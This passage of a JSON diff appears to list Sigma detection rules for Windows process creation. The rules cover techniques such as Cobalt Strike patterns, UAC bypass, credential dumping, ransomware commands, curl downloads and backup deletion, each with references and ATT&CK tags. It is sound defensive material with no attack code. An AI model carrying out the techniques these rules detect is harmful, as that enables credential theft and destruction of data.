"https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ], + "creation_date": "2022/09/13", + "filename": "proc_creation_win_chisel_usage.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Some false positives may occure with other tools with similar commandlines" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "value": "Powershell ChromeLoader Browser Hijacker", + "meta": { + "refs": [ + "https://redcanary.com/blog/chromeloader/", + "https://emkc.org/s/RJjuLa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1176" + ], + "creation_date": "2022/06/19", + "filename": "proc_creation_win_chrome_load_extension.yml", + "author": "Aedan Russell, frack113 (sigma)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "value": "CleanWipe Usage", + "meta": { + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cleanwipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/12/18", + "filename": 
"proc_creation_win_cleanwipe.yml", + "author": "Nasreddine Bencherchali @nas_bench", + "level": "high", + "falsepositive": [ + "Legitimate administrative use (Should be investigated either way)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.", + "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "value": "Use of CLIP", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2021/07/27", + "filename": "proc_creation_win_clip.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of cmdkey to look for cached credentials", + "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "value": "Cmdkey Cached Credentials Recon", + "meta": { + "refs": [ + "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.005" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_cmdkey_recon.yml", + "author": "jmallette, Florian Roth, Nasreddine Bencherchali (update)", + "level": "high", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Adversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", + "value": "Windows Cmd Delete File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2022/01/15", + "filename": "proc_creation_win_cmd_delete.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible payload obfuscation via the commandline", + "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", + "value": "Suspicious Dosfuscation Character in Commandline", + "meta": { + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/02/15", + "filename": "proc_creation_win_cmd_dosfuscation.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of \"/R <\" to read and execute a file via cmd.exe", + "uuid": 
"00a4bacd-6db4-46d5-9258-a7d5ebff4003", + "value": "Read and Execute a File Via Cmd.exe", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_cmd_read_contents.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use \">\" to redicrect information in commandline", + "uuid": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", + "value": "Redirect Output in CommandLine", + "meta": { + "refs": [ + "https://ss64.com/nt/syntax-redirection.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2022/01/22", + "filename": "proc_creation_win_cmd_redirect.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "value": "Suspicious CMD Shell Redirect", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/07/12", + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml", + "author": "Nasreddine 
Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "value": "CMSTP UAC Bypass via COM Object Access", + "meta": { + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://twitter.com/hFireF0X/status/897640081053364225", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ], + "creation_date": "2019/07/31", + "filename": "proc_creation_win_cmstp_com_object_access.yml", + "author": "Nik Seetharaman, Christian Burkard", + "level": "high", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "value": "CMSTP Execution Process Creation", + "meta": { + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ], + "creation_date": "2018/07/16", + "filename": "proc_creation_win_cmstp_execution_by_creation.yml", + "author": "Nik Seetharaman", + "level": "high", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "value": "Operator Bloopers Cobalt Strike Commands", + "meta": { + "refs": [ + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/05/06", + "filename": "proc_creation_win_cobaltstrike_bloopers_cmd.yml", + "author": "_pete_0, TheDFIRReport", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of Cobalt Strike module commands accidentally entered in the CMD shell", + "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "value": "Operator Bloopers Cobalt Strike Modules", + "meta": { + "refs": [ + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/05/06", + "filename": "proc_creation_win_cobaltstrike_bloopers_modules.yml", + "author": "_pete_0, TheDFIRReport", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "value": "CobaltStrike Load by Rundll32", + "meta": { + "refs": [ + "https://www.cobaltstrike.com/help-windows-executable", + "https://redcanary.com/threat-detection-report/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2021/06/01", + "filename": "proc_creation_win_cobaltstrike_load_by_rundll32.yml", + "author": "Wojciech Lesicki", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "uuid": "f35c5d71-b489-4e22-a115-f003df287317", + "value": "CobaltStrike Process Patterns", + "meta": { + "refs": [ + "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" + ], + "tags": [ + "attack.execution", + 
"attack.t1059" + ], + "creation_date": "2021/07/27", + "filename": "proc_creation_win_cobaltstrike_process_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking", + "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", + "value": "Cmd.exe CommandLine Path Traversal", + "meta": { + "refs": [ + "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", + "https://twitter.com/Oddvarmoe/status/1270633613449723905", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2020/06/11", + "filename": "proc_creation_win_commandline_path_traversal.yml", + "author": "xknow @xknow_infosec, Tim Shelton", + "level": "high", + "falsepositive": [ + "(not much) some benign Java tools may product false-positive commandlines for loading libraries" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", + "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", + "value": "Command Line Path Traversal Evasion", + "meta": { + "refs": [ + "https://twitter.com/hexacorn/status/1448037865435320323", + "https://twitter.com/Gal_B1t/status/1062971006078345217", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2021/10/26", + "filename": 
"proc_creation_win_commandline_path_traversal_evasion.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Google Drive", + "Citrix" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "uuid": "435e10e4-992a-4281-96f3-38b11106adde", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/11/10", + "filename": "proc_creation_win_computer_discovery_get_adcomputer.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", + "value": "Conhost.exe CommandLine Path Traversal", + "meta": { + "refs": [ + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" + ], 
+ "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/06/14", + "filename": "proc_creation_win_conhost_path_traversal.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Conti ransomware command line ioc", + "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", + "value": "Conti Ransomware Execution", + "meta": { + "refs": [ + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.s0575", + "attack.t1486" + ], + "creation_date": "2021/10/12", + "filename": "proc_creation_win_conti_cmd_ransomware.yml", + "author": "frack113", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command used by conti to dump database", + "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "value": "Conti Backup Database", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ], + "creation_date": "2021/08/16", + "filename": "proc_creation_win_conti_sqlcmd.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + 
"logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the malicious use of a control panel item", + "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "value": "Control Panel Items", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1196/", + "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", + "attack.persistence", + "attack.t1546" + ], + "creation_date": "2020/06/22", + "filename": "proc_creation_win_control_panel_item.yml", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "value": "Copying Sensitive Files with Credential Data", + "meta": { + "refs": [ + "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_copying_sensitive_files_with_credential_data.yml", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "level": "high", + 
"falsepositive": [ + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the copy command to copy files with the .dmp extensions from a remote share", + "uuid": "044ba588-dff4-4918-9808-3f95e8160606", + "value": "Copy DMP Files From Share", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml" + ], + "tags": [ + "attack.credential_access" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_copy_dmp_from_share.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "value": "CrackMapExec Process Patterns", + "meta": { + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/03/12", + "filename": "proc_creation_win_crackmapexec_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "value": "Node Process Executions", + "meta": { + "refs": [ + 
"https://twitter.com/mttaggart/status/1511804863293784064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127", + "attack.t1059.007" + ], + "creation_date": "2022/04/06", + "filename": "proc_creation_win_creative_cloud_node_abuse.yml", + "author": "Max Altgelt", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", + "value": "Dropping Of Password Filter DLL", + "meta": { + "refs": [ + "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", + "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556.002" + ], + "creation_date": "2020/10/29", + "filename": "proc_creation_win_credential_access_via_password_filter.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Credential Acquisition via Registry Hive Dumping", + "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", + "value": "Credential Acquisition via Registry Hive Dumping", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": 
"2022/10/04", + "filename": "proc_creation_win_credential_acquisition_registry_hive_dumping.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Archer malware invocation via rundll32", + "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "value": "Fireball Archer Install", + "meta": { + "refs": [ + "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", + "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2017/06/03", + "filename": "proc_creation_win_crime_fireball.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "value": "Maze Ransomware", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/", + "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" + ], + "creation_date": "2020/05/08", + "filename": "proc_creation_win_crime_maze_ransomware.yml", + 
"author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", + "value": "Snatch Ransomware", + "meta": { + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ], + "creation_date": "2020/08/26", + "filename": "proc_creation_win_crime_snatch_ransomware.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "value": "Windows Crypto Mining Indicators", + "meta": { + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ], + "creation_date": "2021/10/26", + "filename": "proc_creation_win_crypto_mining_monero.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of crypto miners", + "Some build frameworks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server", + "uuid": 
"bbeaed61-1990-4773-bf57-b81dbad7db2d", + "value": "Curl Usage on Windows", + "meta": { + "refs": [ + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/07/05", + "filename": "proc_creation_win_curl_download.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "value": "CVE-2021-26857 Exchange Exploitation", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution", + "cve.2021.26857" + ], + "creation_date": "2021/03/03", + "filename": "proc_creation_win_cve_2021_26857_msexchange.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "value": "Data Compressed - rar.exe", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_data_compressed_with_rar.yml", + "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", + "level": "low", + "falsepositive": [ + "Highly likely if rar is a default archiver in the monitored environment." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "value": "Wbadmin Delete Systemstatebackup", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2021/12/13", + "filename": "proc_creation_win_delete_systemstatebackup.yml", + "author": 